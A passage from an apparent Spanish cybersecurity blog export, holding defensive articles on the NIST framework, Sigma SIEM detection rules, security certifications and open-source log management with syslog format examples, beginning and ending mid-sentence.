produzca un evento de seguridad. ## Cómo usar el Framework NIST Una organización puede usar el Framework NIST como una parte clave de su proceso sistemático para identificar, evaluar y administrar el riesgo de ciberseguridad. El Framework NIST no está diseñado para reemplazar los procesos existentes. Una organización puede usar su proceso actual y superponerlo en el Framework NIST para determinar las brechas en su enfoque actual de riesgo de ciberseguridad y desarrollar una hoja de ruta hacia la mejora. Utilizando el Framework NIST como una herramienta de gestión de riesgo de ciberseguridad, una organización puede determinar actividades que son más importantes para la prestación de servicios críticos y priorizar los gastos para maximizar el impacto de la inversión. El Framework NIST está diseñado para complementar las operaciones comerciales y de ciberseguridad existentes. Puede servir como base para un nuevo programa de ciberseguridad o un mecanismo para mejorar un programa existente. El Framework NIST proporciona un medio para expresar los requisitos de ciberseguridad a los socios comerciales y clientes y puede ayudar a identificar las lagunas en las prácticas de ciberseguridad de una organización. También proporciona un conjunto general de consideraciones y procesos para considerar las implicaciones de privacidad y libertades civiles en el contexto de un programa de ciberseguridad. ### Implementar o mejorar el programa de ciberseguridad Estos pasos ilustran cómo una organización podría usar el Framework NIST para crear un nuevo programa de ciberseguridad o mejorar un programa existente. Estos pasos deben repetirse según sea necesario para mejorar continuamente la ciberseguridad. 1. Priorizar el alcance. La organización identifica sus objetivos de negocios / misión y las prioridades organizacionales de alto nivel. Con esta información, la organización toma decisiones estratégicas con respecto a las implementaciones de ciberseguridad y determina el alcance de los sistemas y activos que respaldan la línea o proceso comercial seleccionado. El Framework NIST se puede adaptar para admitir las diferentes líneas de negocio o procesos dentro de una organización, que pueden tener diferentes necesidades comerciales y la tolerancia al riesgo asociada. 2. Orientar. Una vez que se ha determinado el alcance del programa de ciberseguridad para la línea de negocio o el proceso, la organización identifica los sistemas y activos relacionados, los requisitos reglamentarios y el enfoque de riesgo general. La organización identifica las amenazas y vulnerabilidades de esos sistemas y activos. 3. Crea un perfil actual. La organización desarrolla un perfil actual al indicar qué resultados de categoría y subcategoría del núcleo del Framework NIST que se están logrando actualmente. 4. Realizar una evaluación de riesgos. Esta evaluación podría estar guiada por el proceso de gestión de riesgos general de la organización o actividades previas de evaluación de riesgos. La organización analiza el entorno operativo para discernir la probabilidad de un evento de ciberseguridad y el impacto que el evento podría tener en la organización. Es importante que las organizaciones intenten incorporar los riesgos emergentes y los datos de amenazas y vulnerabilidades para facilitar una sólida comprensión de la probabilidad y el impacto de los eventos de ciberseguridad. 5. Crea un perfil de destino. La organización crea un Perfil objetivo que se centra en la evaluación de las Categorías y Subcategorías del Framework NIST que describen los resultados deseados de ciberseguridad de la organización. Las organizaciones también pueden desarrollar sus propias categorías y subcategorías adicionales para tener en cuenta los riesgos únicos de la organización. La organización también puede considerar las influencias y los requisitos de las partes interesadas externas, como las entidades del sector, los clientes y los socios comerciales, al crear un perfil objetivo. 6. Determinar, analizar y priorizar brechas. La organización compara el Perfil actual y el Perfil objetivo para determinar las brechas. A continuación, crea un plan de acción priorizado para abordar esas brechas que se basa en los impulsores de la misión, un análisis de costo / beneficio y la comprensión del riesgo para lograr los resultados en el Perfil objetivo. La organización determina los recursos necesarios para abordar las lagunas. El uso de perfiles de esta manera permite a la organización tomar decisiones informadas sobre las actividades de ciberseguridad, respalda la gestión de riesgos y permite a la organización realizar mejoras específicas y rentables. 7. Implementar un plan de acción. La organización determina qué acciones tomar con respecto a las brechas, si las hay, identificadas en el paso anterior. A continuación, supervisa sus prácticas actuales de ciberseguridad contra el perfil objetivo. Para obtener más orientación, el Framework NIST identifica ejemplos de referencias informativas sobre las categorías y subcategorías, pero las organizaciones deben determinar qué normas, directrices y prácticas, incluidas aquellas que son específicas del sector, funcionan mejor para sus necesidades. ## Conclusiones El NIST es un framework de seguridad integral y flexible que es de naturaleza universal. Si bien su origen está en los EE.UU., es reconocido a nivel mundial como un estándar que vale la pena considerar por todas las organizaciones. Los controles proporcionan una base sólida para un programa de seguridad sólido y defendible que cumple con los requisitos de muchos otros estándares de cumplimiento. Los CISO pueden seleccionar funciones y controles que satisfagan sus necesidades específicas, independientemente de la industria o la geografía. --- # Qué son las reglas Sigma y por qué las necesitas URL: https://ciberseguridad.blog/que-son-las-reglas-sigma-y-por-que-las-necesitas/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-06-30 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Las Reglas Sigma son para los registros o logs lo que las reglas Snort son para el tráfico de red y las reglas YARA son para los archivos. ¡ CONÓCELAS ! Es posible que algunos de vosotros ya habráis oído hablar de las reglas Sigma o Sigma Rules, un enfoque genérico para las firmas utilizadas en los sistemas SIEM. Su objetivo principal es proporcionar una forma estructurada en la que los investigadores o analistas puedan describir sus métodos de detección, una vez desarrollados, y compartirlos con otros. Hoy me gustaría describir otro caso de uso que nos ayuda a construir las mejores firmas posibles para cualquier aplicación. En los proyectos típicos de monitorización de seguridad, las personas integran diferentes fuentes de registro y amenazas / casos de uso que desean monitorizar en estos registros. La selección de las fuentes de registro está determinada por la importancia, la disponibilidad y los requisitos operativos. Pero la pregunta central es: > ¿Qué es lo que quiero detectar? Hay varios libros blancos y guías para las fuentes de registro más comunes, como son los registros de eventos de Windows o SSOO (Luego os pondré algunos ejemplos) Lo que si debemos hacer es leer los documentos, extraer los métodos de detección interesantes y definir búsquedas y paneles para nuestro sistema SIEM. Uno de los propósitos principales de las reglas Sigma es disminuir los tiempos de este proceso que consume tanto tiempo. Estas descripciones públicas de los métodos de detección ya forman parte de Sigma o estarán integradas por uno de los colaboradores. Pero hoy me gustaría señalar un caso de uso diferente que veremos más adelante, menos obvio pero muy útil. ## Qué son las reglas Sigma Proveniente de Generic Signature Format for SIEM Systems (Formato genérico de firma para sistemas SIEM) , las reglas Sigma son un formato de firma genérico y abierto que nos permite describir eventos de registros relevantes de una manera directa. El formato de regla es muy flexible, fácil de escribir y aplicable a cualquier tipo de archivo de registro. El objetivo principal de este proyecto es proporcionar una forma estructurada en la que los investigadores o analistas puedan describir sus métodos de detección, una vez desarrollados, y compartirlos con otros. Sigma es para archivos de registro o logs lo que Snort es para el tráfico de red y YARA es para archivos. [Imagen: Reglas-Sigma-SIEM] ## La mejor monitorización posible Los analistas de seguridad intentan definir búsquedas útiles y análisis estadísticos en los datos de registro de todas las fuentes de logs diferentes. Por lo general, siguen las guías públicas y crean muchas reglas diferentes de "inicio de sesión fallido" para todo tipo de sistemas operativos y aplicaciones. Pero, ¿qué sucede cuando comienzas a integrar fuentes de registro y tipos que no están cubiertos por directrices públicas? Hay diferentes enfoques para este problema: - Cubrir los intentos fallidos de autenticación - Monitorizar cualquier evento fallido - Usar desviaciones estadísticas (muchos eventos nuevos de cierto tipo) - Mirar a través de los datos de registro y seleccionar mensajes "interesantes" - Hablar con los propietarios / administradores de la aplicación (a menudo de forma bastante decepcionante) - Hablar con los desarrolladores de la aplicación (en caso de desarrollo interno) Todos estos métodos son válidos y pueden ayudarnos a configurar búsquedas útiles en los datos disponibles. Sin embargo, para crear las mejores firmas y alertas posibles tenemos que considerar lo siguiente: - Las condiciones de fallo más interesantes y relevantes no ocurren en condiciones normales y, por lo tanto, no aparecen en los datos de registro cotidianos (los datos de registro que tenemos para seleccionar eventos interesantes) - Los desarrolladores conocen las condiciones de error más raras o más relevantes y los ID y mensajes de error correspondientes - Todos los mensajes de error posibles de una aplicación aparecen en su código fuente Imagina que pudiesemos extraer los mensajes más interesantes que la aplicación puede generar y definir reglas para estas condiciones. Imagina que este proceso es una tarea fácil que cualquier desarrollador puede realizar. Bueno, pues tenemos a nuestro alcance todas lo que necesitamos para múltiples casos. ### Un ejemplo: vsftpd Un enfoque más claro. En condiciones óptimas, solicitamos a los desarrolladores que extraigan los mensajes de error más relevantes o anormales que las aplicaciones produzcan en condiciones que indiquen una manipulación o ataque. Alternativamente, podemos hacerlo nosotros mismos y verificar los resultados con los datos de registro disponibles para evitar falsos positivos. Revisamos el código fuente del servidor FTP vsftpd en Github 'para ver los mensajes de error que indican condiciones de error raro y fallas fatales. [Imagen: Mensajes de error en servifor ftp] Como resultado de dicha observación: [Imagen: Fima Sigma] Con ello, la idea es construir una gran base de firmas compartidas para los diferentes tipos de aplicaciones y servicios. También podríamos tratar de convencer a los desarrolladores para que proporcionen las reglas Sigma de sus aplicaciones para ayudar a las organizaciones a establecer la mejor monitorización posible de los aplicativos. Sería de gran ayuda extrae cadenas de mensajes de error que contienen ciertas palabras clave como "error", "fatal", "permiso denegado", "rechazado" u otros para facilitar este proceso a la hora de crear alertas y escribir reglas. ## Porqué empezar con las Reglas Sigma !YA¡ [Vídeo](https://www.youtube.com/watch?v=OheVuE9Ifhs) Casos de uso: - Describir un método de detección que sea compartible - Escribir reglas homogeneas para el SIEM busca que las reglas Sigma eviten el bloqueo de proveedores - Compartir las firma en el apéndice de análisis junto con IOCs y reglas YARA - Compartir la firma en comunidades de inteligencia de amenazas, por ejemplo a través de MISP - Proporcione firmas Sigma por comportamiento malicioso para nuestras propias aplicaciones ## Conclusiones La primera y más importante, empezar cuanto antes a aplicar todo el catálogo de reglas Sigmas posibles. Hoy, todos recopilan datos de registro para el análisis. Las personas comienzan a trabajar por su cuenta, procesan numerosos libros blancos, publicaciones de blogs y guías de análisis de registros, extraen la información necesaria y crean sus propias búsquedas y paneles. Algunas de sus búsquedas y correlaciones son geniales y muy útiles, pero carecen de un formato estandarizado en el que puedan compartir su trabajo con otros. Otros proporcionan análisis excelentes, incluyen IOCs y reglas YARA para detectar los archivos maliciosos y las conexiones de red, pero no tienen forma de describir un método de detección específico o genérico en los eventos de registro. Sigma pretende ser un estándar abierto en el que tales mecanismos de detección se puedan definir, compartir y recopilar a fin de mejorar las capacidades de detección para todos. Mediante una serie de Especificaciones para Reglas Sigma , podemos encontrar ejemplos maravillosos a implementar ya: 1. Registro de eventos de seguridad de Windows: acceso al proceso LSASS con cierta máscara de acceso / tipo de objeto (experimental) : [Imagen: Windos Sigma Rule] 1. Sysmon: Creación remota de subprocesos en el proceso LSASS [Imagen: Creaci-n-remota-de-subprocesos-en-el-proceso-LSASS] 1. Registros de acceso al servidor web: detección de shell web [Imagen: Registros-de-acceso-al-servidor-web-detecci-n-de-shell-web] 1. Sysmon: Detección de Shell Web [Imagen: Sysmon: detección de shell web] 5.Registro de eventos de seguridad de Windows: Número sospechoso de inicios de sesión fallidos desde una estación de trabajo de fuente única [Imagen: Windows-n-mero-sospechoso-de-inicios-de-sesi-n-fallidos-desde-una-estaci-n-de-trabajo-de-fuente--nica] --- # 7 certificaciones en ciberseguridad que deberías tener URL: https://ciberseguridad.blog/7-certificaciones-en-ciberseguridad-que-deberias-tener/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-06-17 Actualizado: 2026-10-04 Tema: Curso y Master en Ciberseguridad > Si quieres saber cuales son las certificaciones de seguridad informática mejor valoradas y más reconocidas en el mundo IT y Cloud. ! Empieza por estas ¡ Esta semana me preguntaba un seguidor del blog, ¿Que certificación puedo prepararme este verano?, antes de nada, indicaros que estas certificaciones que os muestro a continuación, llevan implicito un duro trabajo y preparación, lo que es posible que nos lleve un poco más que los meses de verano para poder prepararlas. Pero la idea me parece genial, porque nó cambiar nuestra típica novela venariega por un libro para preparar una certificación. Lleguemos a sacarla o nó, habermos ganado en el camino. Y es que las organizaciones modernas se enfrentan a más ciberamenazas que nunca. Las infracciones de datos y los ataques sistemáticos a los recursos de la compañía son cada vez más frecuentes, y no hay señales de que esta tendencia se ralentice, al contrario, los ataques informáticos van en aumento. Los enfoques generalizados para la seguridad del sistema ya no brindan suficiente protección contra unas amenazas cada vez más sofisticadas, y escasean los profesionales de seguridad calificados para combatir estas amenazas. Es por esta razón que las empresas están dispuestas a pagar un precio superior por profesionales en ciberseguridad certificados, o comprometerse a certificar a sus trabajadores en activo. ## EC-Council Certificado Hacker Ético (CEH) [Imagen: Certificacion-CEH] El CEH es una calificación avanzada de pruebas de penetración que evalúa la capacidad del candidato para buscar e identificar posibles riesgos de seguridad dentro de la infraestructura de redes e informáticas de una organización. El CEH es uno de los cursos fundamentales ofrecidos por EC-Council y es un buen punto de partida antes de aventurarse en el examen del Analista de Seguridad Certificado - EC-Council Certified Security Analyst (ESCA). - Requisitos previos: Los candidatos deben asistir a la capacitación oficial o tener al menos dos años de experiencia relacionada con la seguridad de la información. - Examen: El examen CEH contiene 125 preguntas y dura cuatro horas. Se debe sacar un 70% para superar la prueba. - Coste: El examen de la Versión 9 cuesta 850$ para residentes de EE.UU. 750€ - 885$ para candidatos internacionales. El examen es administrado por ECC EXAM, VUE. Podeis obtener más información en la web oficial de la certificación CEH. - Material didáctico: Podemos obtener buen materia de estudio en el CEH Boot Camp de InfoSec Institute . Buen recurso de preparación de exámenes para aquellos que buscan más estructura en el proceso de preparación. Existen muchos roles de seguridad donde se requieren certificaciones de tipo CEH. La CEH enseña habilidades valiosas con pruebas prácticas. Es una buena certificación para los profesionales de la seguridad de la información y los administradores de red que buscan una introducción al hacking ético y las pruebas de penetración. ## CompTIA Security+ (SY0-401) [Imagen: comptia-security-] La certificación CompTIA Security + es una certificación popular, independiente del proveedor, que es un buen punto de partida para los profesionales de la seguridad de la información. La certificación Security + está dirigida a profesionales de seguridad de nivel inicial y ofrece información generalizada para ayudar a los candidatos a desarrollar una comprensión fundamental de la seguridad de la información. El examen Security + presenta seis dominios valiosos para los aspirantes a profesionales de la seguridad de la información. - Requisitos previos: Se recomienda disponer de la certificación de CompTIA Network + y dos años de experiencia en administración de sistemas con un enfoque de seguridad. - Examen: CompTIA Security + SY0-401 tiene un máximo de 90 preguntas y dura 90 minutos. La puntuación para aprobar es del 75% en una escala de 100-900. - Coste del examen: 320$ - 275€. - Material de aprendizaje: Los materiales de estudio de CompTIA se pueden encontrar aquí. El Security + Boot Camp de InfoSec Institute es también un buen recurso de preparación de exámenes para aquellos que buscan otros recursos adicionales. Los candidatos que logran la certificación de Security + están obligados a ver un retorno en su inversión inicial. La Oficina de Estadísticas Laborales afirma que los especialistas en seguridad, administradores y gerentes con la certificación Security + pueden ganar hasta 86,000 $/año (Esto, por supuesto, no podremos trasladarlo al mercado laboral Español). Security + también es reconocido y aprobado a nivel mundial por el Departamento de Defensa de EE.UU. CompTIA Security + cumple con las normas ISO 17024, así como con los requisitos de la Directiva 8570.01-M del Departamento de Defensa, que podrían permitir que los candidatos obtengan un puesto dentro del gobierno. Este es un excelente curso de nivel de entrada excelente para aquellos nuevos en el mundo de la seguridad de la información. ## (ISC)² Certified Information Systems Security Professional (CISSP) [Imagen: dominios-CISSP] El CISSP es una calificación de élite que muestra la madurez de los empleados que tienen una base sólida en seguridad digital. Las habilidades aprendidas en este curso son fundamentales para cualquier persona que necesite diseñar, ó diseñar e implementar sistemas de seguridad de la información en el puesto de trabajo. El CISSP mide objetivamente las habilidades de los candidatos. Esta es la razón por la cual la certificación tiene tanto valor entre los profesionales de seguridad TI. El CISSP es reconocido a nivel mundial. No importa dónde te lleve tu carrera, el CISSP te ubicará por encima de otros candidatos con niveles similares de experiencia que no tienen la certificación. - Requisitos previos: Se debe tener al menos cinco años de experiencia remunerada en un trabajo de tiempo completo en un campo relacionado con el tema del examen CISSP. También se debe tener conocimiento de al menos dos de los ocho dominios en el material de estudio o cuerpo de conocimiento común (CBK). Los candidatos sin la experiencia laboral requerida pueden satisfacer el requisito con un año de experiencia laboral y un título universitario de cuatro años, o una credencial aprobada de la vía de prerrequisito del CISSP. Otra opción para quienes no tienen la experiencia laboral adecuada es tomar el examen y obtener una designación de Asociado de (ISC)². Los candidatos tendrán seis años para obtener la experiencia laboral requerida para el CISSP. - Examen CISSP: El examen tiene 250 preguntas innovadoras de opción múltiple y avanzadas y dura seis horas. 700 de 1000 puntos, o lo que es lo mismo, el 70% es la puntuación necesaria para aprobar. - Coste del CISSP: 599$ para las regiones de América, Asia Pacífico, Medio Oriente y África. Es administrado por Pearson VUE. - Material de aprendizaje: (ISC)² Los materiales de estudio se pueden encontrar aquí. El CISSP es una certificación universalmente reconocida que puede impulsar tu carrera y aumentar tus ganancias. Es una de las certificaciones más codiciadas en seguridad de la información: cualquier persona que esté buscando avanzar en su carrera haría bien en completar esta certificación. ## (ISACA) Certified Information Security Manager (CISM) [Imagen: certificaciones-ISACA] El CISM está orientado a personas que buscan un puesto gerencial superior en el que la seguridad de la información, la garantía y la gestión de riesgos formen parte de sus responsabilidades laborales. Cubre los principios de administración de seguridad que son tanto prácticos como vitales para la capacidad del candidato para llevar a cabo sus tareas en el rol de un administrador de seguridad de sistemas de información. - Requisitos previos: Los candidatos que buscan esta certificación deben tener cinco años de experiencia laboral en el campo de la seguridad de la información, con al menos tres años en el puesto de gerente de seguridad de la información. Esto debe ser verificado antes de que los candidatos puedan realizar el examen. - Examen CISM: El examen CISM consiste en 200 preguntas y lleva cuatro horas completarlas. La puntuación oscila entre 200 y 800, con una puntuación de 450 que es la calificación por la que se aprueba el examen. - Costo del CISM: La inscripción anticipada es de 575$ para los miembros de ISACA y de 760$ para los miembros que no pertenecen a ISACA. - Material de aprendizaje: Los materiales de estudio de ISACA se pueden encontrar aquí. El CISM Boot Camp de InfoSec Institute es también un buen recurso de preparación de exámenes para aquellos que buscan más estructura en el proceso de preparación. A medida que la demanda de profesionales de gestión de la seguridad de la información sigue aumentando, también aumenta la demanda de los profesionales certificados en CISM. Los roles gerenciales en la seguridad de la información también son publicitados más ampliamente por las compañías corporativas que buscan retener gerentes de seguridad de la información capacitados. Los profesionales de seguridad de la información que buscan pasar a puestos gerenciales encontrarán que esta certificación es especialmente útil. ## (ISACA) Certified Information Systems Auditor (CISA) El CISA se considera como un estándar de logros de renombre mundial para cualquier profesional de la seguridad que tenga que auditar, controlar y monitorizar la tecnología de la información y los sistemas comerciales. Esta calificación ha sido acreditada por el Instituto Nacional Estadounidense de Estándares (ANSI), por lo que es una gran opción para cualquier profesional de la seguridad que esté buscando obtener una certificación que sea un estándar reconocido internacionalmente. - Requisitos previos: Los candidatos deben tener cinco años de experiencia laboral en el campo realizando tareas específicamente relacionadas con la auditoría, el control, la garantía o la seguridad de los sistemas de información. - Examen CISA: El CISA consta de 200 preguntas y toma cuatro horas completarlas. La puntuación oscila entre 200 y 800, con una puntuación de 450 cómo calificación para aprobar del examen. - Coste del examen CISA: La inscripción anticipada es de 575$ para los miembros de ISACA y de 760$ para los miembros que no pertenecen a ISACA. - Material de estudio: Los materiales de estudio de ISACA se pueden encontrar aquí. Pero si navegamos un poco, podemos ver buenos recursos de preparación de exámenes para aquellos que buscan más estructura en el proceso de preparación. Un candidato certificado de CISA encontrará muchos grandes beneficios para obtener esta designación, que incluye mejores perspectivas de empleo y una mayor influencia en el lugar de trabajo. Esta certificación es altamente beneficiosa para cualquier persona que trabaje en TI y es responsable de auditar, controlar ó controlar y evaluar los sistemas TI. ## (ISC)² Certified Cloud Security Professional (CCSP) Una de las principales razones por las que los profesionales de seguridad toman el CCSP es para demostrar que están bien informados sobre la seguridad cloud y todas las consideraciones de seguridad relacionadas con cloud: Un entorno a la vanguardia de la innovación empresarial en TI. Los entornos en la nube están llenos de desafíos de seguridad que cambian a diario, por lo que obtener el CCSP es vital para mostrar que estamos bien informado sobre las consideraciones de seguridad necesarias que son parte integrante de la computación cloud. - Requisitos previos: Los candidatos deben tener un mínimo de cinco años de experiencia a tiempo completo en TI, de los cuales tres años deben estar en seguridad de la información. También deben tener un año de experiencia en al menos una de las seis áreas del Common Knowledge (CBK) del CCSP. - Examen CCSP: El examen CCSP contiene 125 preguntas y dura cuatro horas. La puntuación para aprobar es de 700 de 1000 puntos. - Costo del examen CCSP: El examen cuesta 549$ por intento, con una tarifa de mantenimiento anual de 100$ (Sé lo que pensais, es una mina de oro). El examen es administrado por Pearson VUE. - Material de aprendizaje: Los materiales (ISC)² de estudio se pueden encontrar aquí. El Boot Camp CCSP del InfoSec Institute es también un buen recurso de preparación de exámenes para aquellos que buscan completar el proceso de preparación. Esta certificación ayuda a los candidatos a demostrar competencia en seguridad de datos en la nube, arquitectura y diseño Cloud, así como en las operaciones diarias, consideraciones de seguridad de aplicaciones y mucho más. Cualquiera que esté buscando un rol en un ambiente basado en cloud estará bien servido con una certificación CCSP. ## GIAC Security Essentials (GSEC) Global Information Assurance Certification (GIAC) es el proveedor y desarrollador líder de certificaciones de ciberseguridad y es reconocido mundialmente por líderes gubernamentales, militares y de la industria. GIAC prueba y valida la capacidad de los profesionales en áreas tales como administración de seguridad, análisis forense, administración, auditorías, seguridad de software y mejores prácticas legales. La certificación GIAC Security Essentials (GSEC) está diseñada para candidatos que desean demostrar habilidades en roles de sistemas de TI y tareas de seguridad de la información. El GSEC es visto como una certificación altamente deseable. Enseña las mejores prácticas y métodos de seguridad generales para aplicaciones del mundo real. - Prerrequisitos: Ninguno - Examen GSEC: Examen GIAC Security Essentials (GSEC) es un examen supervisado de cinco horas con 180 preguntas. Se debe obtener una puntuación de 73% para aprobar. - Coste del examen GSEC: 1,699$, administrado por Pearson VUE (el precio del afiliado para la certificación GIAC junto con la capacitación SANS es de 689$, el intento de recertificación es de 399$). - Material de aprendizaje: Toda la información se puede encontrar aquí. La certificación GSEC aumentará tu confianza y competencia en la seguridad y protección del sistema. Esta certificación es una excelente calificación para incluir en tu currículum profesional. --- # Soluciones open source para la gestión de logs en ciberseguridad URL: https://ciberseguridad.blog/soluciones-open-source-para-la-gestion-de-logs-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-06-10 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > El SIEM tiene un papel crucial en ciberseguridad. Analizamos, múltiples formas de recolección, tratamiento de logs y herramientas open source, como Kibana. La gestión centralizada del registro de eventos desempeña un papel crucial en la supervisión de ciberseguridad y análisis forense de redes, ya que permite reunir eventos de miles de nodos (servidores, dispositivos de red, sensores IPS, etc.) en unos pocos servidores dedicados donde se realiza el análisis central. El análisis puede ser un proceso en tiempo real, donde los incidentes de seguridad se detectan a partir de eventos entrantes a través de la correlación de eventos y otras técnicas avanzadas de monitorización, también puede ser una actividad forense offline, donde se investigan eventos pasados para estudiar incidentes de seguridad que ya han ocurrido. Sin la recopilación de eventos en las ubicaciónes centrales, las actividades de supervisión y análisis forense tendrían que llevarse a cabo en nodos de red individuales, lo cual lleva mucho tiempo y evita la resolución oportuna de incidentes de seguridad. Por ejemplo, si un incidente de seguridad involucra cientos de nodos de red, los registros de eventos para todos los nodos tendrían que analizarse por separado. Además, el atacante puede borrar eventos del registro de eventos local para eliminar cualquier rastro de sus actividades maliciosas. Si se registran todos los eventos, tanto localmente como en un servidor de recopilación de registros central, este último siempre tendrá una copia del registro de eventos original, lo que facilita la investigación forense incluso si se pierde el registro original. Por las razones anteriores, se han creado varias soluciones comerciales y de código abierto para la recopilación de eventos y el análisis centralizado. Algunas de estas soluciones están diseñadas solo para la gestión de registros, mientras que otras son marcos completos de SIEM (Información de seguridad y Gestión de eventos). La imagen proporciona una descripción general de los componentes esenciales de un marco de gestión de registro de eventos: [Imagen: arquitectura-siem] Como se muestra, los nodos del sistema de TI están utilizando protocolos como IETF syslog para enviar eventos a los servicios del recopilador en el servidor de registro central. Los servicios de recopilación utilizan diversas técnicas para filtrar y normalizar eventos y almacenar eventos preprocesados en algunos medios de almacenamiento (por ejemplo, una base de datos o un archivo plano). El personal de ciberseguridad pueden acceder a los datos almacenados a través de una GUI para realizar búsquedas, crear informes y otras tareas analíticas. Si bien las soluciones de administración de registros comerciales son revisadas y comparadas regularmente por organizaciones independientes (por ejemplo, los informes del Cuadrante Mágico de Gartner para soluciones SIEM): [Imagen: SIEM-gartner-2017] Estas comparaciones a menudo son difíciles de encontrar para herramientas de código abierto, especialmente para soluciones creadas recientemente. Sin embargo, muchas instituciones están utilizando herramientas de código abierto para monitorizar y hacer análisis forense, ya que permiten la implementación de marcos de detección y análisis de incidentes de una manera rentable. Además, las soluciones de código abierto recientemente presentadas han iniciado una nueva tendencia arquitectónica, donde el sistema de gestión de registros consta de módulos independientes y reemplazables que interactúan a través de interfaces y protocolos bien definidos. Por el contrario, la mayoría de los sistemas comerciales son esencialmente soluciones monolíticas donde los componentes individuales (como la GUI o el servicio de recopilador de eventos) no se pueden cambiar para un componente de otro proveedor. En el post nos centraremos en las soluciones de código abierto para la gestión de registros recientes en este campo, que cubren las nuevas tecnologías y soluciones que han aparecido durante los últimos 2 o 3 años. En primer lugar, proporcionaremos una descripción general de los protocolos de recopilación de logs de uso común y las técnicas de almacenamiento de registros. Luego, pasaremos a una descripción detallada de los servidores de recopilación de eventos avanzados y los sistemas de administración de registros gráficos. La primera contribución de este documento es una comparación analítica de las herramientas presentadas, la segunda contribución es una evaluación comparativa detallada del desempeño de las herramientas. Para este propósito, realizamos una serie de experimentos para evaluar el consumo de recursos y la velocidad de procesamiento de eventos bajo una carga pesada. Hasta donde sabemos, tales evaluaciones de desempeño no se han llevado a cabo recientemente para soluciones de gestión de registro de código abierto de última generación. ## Protocolos de recopilación de eventos en logs ### BSD syslog protocol Hasta la década de 1980, el registro de eventos se lograba principalmente escribiendo eventos en un archivo que residía en un sistema de archivos local, o en algún otro medio de almacenamiento local de eventos (por ejemplo, un buffer de anillo basado en la memoria). En la década de 1980, Eric Allman propuso el protocolo BSD syslog para la recopilación de registros de eventos, que se utilizó inicialmente en el sistema de envío de correos de sendmail, pero luego gradualmente fue ampliamente aceptado por la mayoría de los proveedores. De acuerdo con el protocolo syslog de BSD, los mensajes de registro se envían a través de la red como datagramas UDP, con cada mensaje encapsulado en un paquete UDP separado. Cada mensaje tiene cierta facilidad y gravedad, donde la instalación indica el tipo de remitente. El protocolo BSD define 24 valores de facilidad y 8 valores de severidad que van de 0 a 23 y de 0 a 7 respectivamente. Por ejemplo, el valor de facilidad 0 significa un kernel del sistema operativo, 2 un sistema de correo y 3 un daemon del sistema, mientras que el valor de gravedad 7 significa un mensaje de depuración, 4 un mensaje de advertencia y 0 un mensaje de emergencia. Por razones de conveniencia, a menudo se usan acrónimos textuales en lugar de números, p. el correo denota la instalación 2 y la advertencia denota la gravedad 4. Según BSD syslog, la carga útil del paquete UDP que transporta el mensaje debe tener el formato Timestamp Hostname MSG, donde Priority se define como una cadena de caracteres de un número (8 * facility_value ) + severity_value. Por ejemplo, el siguiente mensaje representa una advertencia: "ids 1299 : escaneo de puerto desde 192.168.1.102" para la instalación daemon que se emitió el 17 de noviembre a las 12:33:59 por el nodo de red myhost2: <28>Nov 17 12:33:59 myhost2 ids[1299]: port scan from 192.168.1.10 Por convención, los alfanuméricos que inician el campo MSG se consideran como el subcampo Etiqueta que representa el nombre del programa emisor ("ids" en el ejemplo anterior), mientras que el resto del campo MSG se considera como el subcampo Contenido ("1299: escaneo de puertos de 192.168.1.102 "en el ejemplo anterior). El subcampo Etiqueta a menudo va seguido de un número entre corchetes que representa el ID del proceso del programa de envío (1299 en el ejemplo anterior). Tenga en cuenta que algunos servidores syslog consideran el ID del proceso con corchetes y los dos puntos como parte del campo Etiqueta. Por un lado, dado que BSD syslog está basado en UDP, es un protocolo liviano y eficiente que consume muy poco ancho de banda de red y recursos del sistema. Por otro lado, el protocolo tiene una serie de inconvenientes que se resumen a continuación: 1. No admite la transmisión confiable de mensajes a través de TCP. 2. No admite cifrado y autenticación. 3. Las marcas de tiempo no son lo suficientemente específicas, ya que carecen del número de año, la información de la zona horaria y las fracciones de segundo. 4. Aparte del nombre del programa emisor y su ID de proceso, el campo MSG no tiene estructura. Para abordar el primer problema, se propuso un "sabor" TCP del protocolo syslog BSD durante la década anterior, donde se envía una secuencia de mensajes en formato syslog BSD a través de una conexión TCP, con un carácter de nueva línea (ASCII 10) que actúa como separador entre mensajes. Este tipo de protocolo también permite el uso de otras utilidades (por ejemplo, stunnel) para configurar túneles seguros para el registro y, por lo tanto, para abordar el segundo problema. ### IETF syslog protoco En 2009, se propuso el protocolo Syslog de IETF que aborda los inconvenientes de BSD syslog. El syslog de IETF admite la transmisión segura de mensajes a través de TLS, pero también la transmisión no encriptada a través de UDP. Además, utiliza un nuevo formato de mensaje con marcas de tiempo RFC3339 más detalladas y bloques de datos estructurados. El siguiente ejemplo representa el mensaje de muestra anterior en el nuevo formato: <28>1 2012-11-17T12:33:59.223+02:00 myhost2 ids 1299 - [timeQuality tzKnown="1" isSynced="1"][origin ip="10.1.1.2"] port scan from 192.168.1.102 La especificación de prioridad <28> es seguida inmediatamente por el número de versión del protocolo (actualmente establecido en 1). Además, el emisor está pasando dos bloques de datos estructurados timeQuality tzKnown = "1" isSynced = "1" y origin ip = "10.1.1.2" al remitente, y el primero indica que el reloj del remitente está sincronizado a una fuente de tiempo externa confiable, y el segundo que indica la dirección IP del remitente. ### CEE syslog format Otro esfuerzo actualmente en curso para introducir estructura para registrar mensajes es la iniciativa de Expresión de Eventos Comunes (CEE). CEE ha propuesto formatos JSON y XML para eventos, al tiempo que sugiere el uso de los protocolos syslog BSD e IETF para transportar eventos con formato JSON. A continuación, se muestra un evento de ejemplo en formato JSON que se ha encapsulado en un mensaje de syslog de BSD: <28>Nov 17 12:33:59 myhost2 ids[1299]: @cee:{"pname":"ids","pid":1299,"msg":"port scan from 192.168.1.102","action":"portscan","dst":"192.168.1.102"} Pasar tal estructura de pares de palabras clave-valor del remitente al receptor facilitará el análisis del mensaje en el lado del receptor. Además, el formato JSON es compatible con los protocolos syslog BSD e IETF, ya que este formato se usa dentro del campo MSG, que no tiene una estructura predefinida. ### Otros protocolos de registro de logs Además de los protocolos de registro de eventos antes mencionados, se podrían emplear otros protocolos para la recopilación de eventos. A continuación, discutiremos brevemente algunas alternativas a BSD e IETF syslog. El protocolo SNMP es un protocolo bien establecido de monitorización y administración basado en UDP que se introdujo en la década de 1980. Aunque el enfoque principal de SNMP radica en la gestión de fallas y rendimiento de redes grandes, la información relacionada con la seguridad a veces se transmite con 